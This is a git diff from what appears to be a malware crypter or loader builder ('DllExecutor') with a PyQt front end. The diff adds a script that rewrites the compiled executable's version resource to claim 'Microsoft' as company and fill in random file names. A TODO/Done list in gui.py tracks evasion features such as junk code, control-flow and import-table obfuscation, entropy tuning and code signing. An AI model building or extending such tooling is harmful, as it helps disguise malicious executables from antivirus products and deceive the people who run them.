diff --git a/.gitignore b/.gitignore
index 4d361c9..36f8c1f 100644
--- a/.gitignore
+++ b/.gitignore
@@ -4,3 +4,5 @@
__pycache__
Debug
Release
+config.h
+sample.h
\ No newline at end of file
diff --git a/DllExecutor.rc b/DllExecutor.rc
new file mode 100644
index 0000000..d96ce7e
--- /dev/null
+++ b/DllExecutor.rc
@@ -0,0 +1,100 @@
+// Microsoft Visual C++ generated resource script.
+//
+#include "resource.h"
+
+#define APSTUDIO_READONLY_SYMBOLS
+/////////////////////////////////////////////////////////////////////////////
+//
+// Generated from the TEXTINCLUDE 2 resource.
+//
+#include "winres.h"
+
+/////////////////////////////////////////////////////////////////////////////
+#undef APSTUDIO_READONLY_SYMBOLS
+
+/////////////////////////////////////////////////////////////////////////////
+// Français (France) resources
+
+#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_FRA)
+LANGUAGE LANG_FRENCH, SUBLANG_FRENCH
+#pragma code_page(1252)
+
+#ifdef APSTUDIO_INVOKED
+/////////////////////////////////////////////////////////////////////////////
+//
+// TEXTINCLUDE
+//
+
+1 TEXTINCLUDE
+BEGIN
+ "resource.h\0"
+END
+
+2 TEXTINCLUDE
+BEGIN
+ "#include ""winres.h""\r\n"
+ "\0"
+END
+
+3 TEXTINCLUDE
+BEGIN
+ "\r\n"
+ "\0"
+END
+
+#endif // APSTUDIO_INVOKED
+
+
+/////////////////////////////////////////////////////////////////////////////
+//
+// Version
+//
+
+VS_VERSION_INFO VERSIONINFO
+ FILEVERSION 1,0,0,1
+ PRODUCTVERSION 1,0,0,1
+ FILEFLAGSMASK 0x3fL
+#ifdef _DEBUG
+ FILEFLAGS 0x1L
+#else
+ FILEFLAGS 0x0L
+#endif
+ FILEOS 0x40004L
+ FILETYPE 0x1L
+ FILESUBTYPE 0x0L
+BEGIN
+ BLOCK "StringFileInfo"
+ BEGIN
+ BLOCK "040c04b0"
+ BEGIN
+ VALUE "CompanyName", "Microsoft"
+ VALUE "FileDescription", "vhasdzagtqqfokxkxnwj"
+ VALUE "FileVersion", "1.0.0.1"
+ VALUE "InternalName", "apwjxnl.exe"
+ VALUE "LegalCopyright", "Copyright (C) 2023"
+ VALUE "OriginalFilename", "cwresrj.exe"
+ VALUE "ProductName", "fkdhtat.exe"
+ VALUE "ProductVersion", "1.0.0.1"
+ END
+ END
+ BLOCK "VarFileInfo"
+ BEGIN
+ VALUE "Translation", 0x40c, 1200
+ END
+END
+
+#endif // Français (France) resources
+/////////////////////////////////////////////////////////////////////////////
+
+
+
+#ifndef APSTUDIO_INVOKED
+/////////////////////////////////////////////////////////////////////////////
+//
+// Generated from the TEXTINCLUDE 3 resource.
+//
+
+
+/////////////////////////////////////////////////////////////////////////////
+#endif // not APSTUDIO_INVOKED
+
diff --git a/DllExecutor.vcxproj b/DllExecutor.vcxproj
index 4a37fac..2428678 100644
--- a/DllExecutor.vcxproj
+++ b/DllExecutor.vcxproj
@@ -117,6 +117,7 @@
false
/NXCOMPAT:no %(AdditionalOptions)
%(AdditionalDependencies)
+ true
@@ -156,8 +157,12 @@
+
+
+
+
diff --git a/DllExecutor.vcxproj.filters b/DllExecutor.vcxproj.filters
index de85741..7ec23b8 100644
--- a/DllExecutor.vcxproj.filters
+++ b/DllExecutor.vcxproj.filters
@@ -26,5 +26,13 @@
Fichiers d%27en-tête
+
+ Fichiers d%27en-tête
+
+
+
+
+ Fichiers de ressources
+
\ No newline at end of file
diff --git a/gui.py b/gui.py
index f79d32c..55b0782 100644
--- a/gui.py
+++ b/gui.py
@@ -13,7 +13,6 @@ TODO :
- Good entropy
- Good Section sizes
- Add resources
- - Change PE metadata (company, description, etc...)
- Random Windows API calls (help)
- Code signing (optional)
@@ -22,12 +21,14 @@ Done :
- Junk code
- Control flow
- IAT obfuscation (adding "normal" imports in addition to the others)
+ - Change PE metadata (company, description, etc...)
"""
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QCoreApplication
from obfuscation import obfuscate
+from metadata import change_metadata
import os, shutil
class Ui_mainWindow(object):
@@ -168,6 +169,13 @@ class Ui_mainWindow(object):
self.label_2.setText("done.")
QCoreApplication.processEvents()
+ self.label_2.setText("Changing metadata...")
+ QCoreApplication.processEvents()
+ change_metadata()
+
+ self.label_2.setText("done.")
+ QCoreApplication.processEvents()
+
self.label_2.setText("Compiling...")
QCoreApplication.processEvents()
diff --git a/metadata.py b/metadata.py
new file mode 100644
index 0000000..79e3fae
--- /dev/null
+++ b/metadata.py
@@ -0,0 +1,27 @@
+from randomness import *
+
+def change_metadata() :
+ f = open("DllExecutor.rc", "r")
+ f_c = f.readlines()
+ f.close()
+
+ o = open("DllExecutor.rc", "w")
+ for line in f_c :
+ if "CompanyName" in line :
+ line = f'\t\t\tVALUE "CompanyName", "Microsoft"\n'
+
+ elif "FileDescription" in line :
+ line = f'\t\t\tVALUE "FileDescription", "{GetRandomString(20)}"\n'
+
+ elif "InternalName" in line :
+ line = f'\t\t\tVALUE "InternalName", "{GetRandomString(7)}.exe"\n'
+
+ elif "OriginalFilename" in line :
+ line = f'\t\t\tVALUE "OriginalFilename", "{GetRandomString(7)}.exe"\n'
+
+ elif "ProductName" in line :
+ line = f'\t\t\tVALUE "ProductName", "{GetRandomString(7)}.exe"\n'
+
+ o.write(line)
+
+ o.close()
\ No newline at end of file
diff --git a/resource.h b/resource.h
new file mode 100644
index 0000000..773560c
--- /dev/null
+++ b/resource.h
@@ -0,0 +1,14 @@
+//{{NO_DEPENDENCIES}}
+// Microsoft Visual C++ generated include file.
+// Used by DllExecutor.rc
+
+// Valeurs par défaut suivantes des nouveaux objets
+//
+#ifdef APSTUDIO_INVOKED
+#ifndef APSTUDIO_READONLY_SYMBOLS
+#define _APS_NEXT_RESOURCE_VALUE 101
+#define _APS_NEXT_COMMAND_VALUE 40001
+#define _APS_NEXT_CONTROL_VALUE 1001
+#define _APS_NEXT_SYMED_VALUE 101
+#endif
+#endif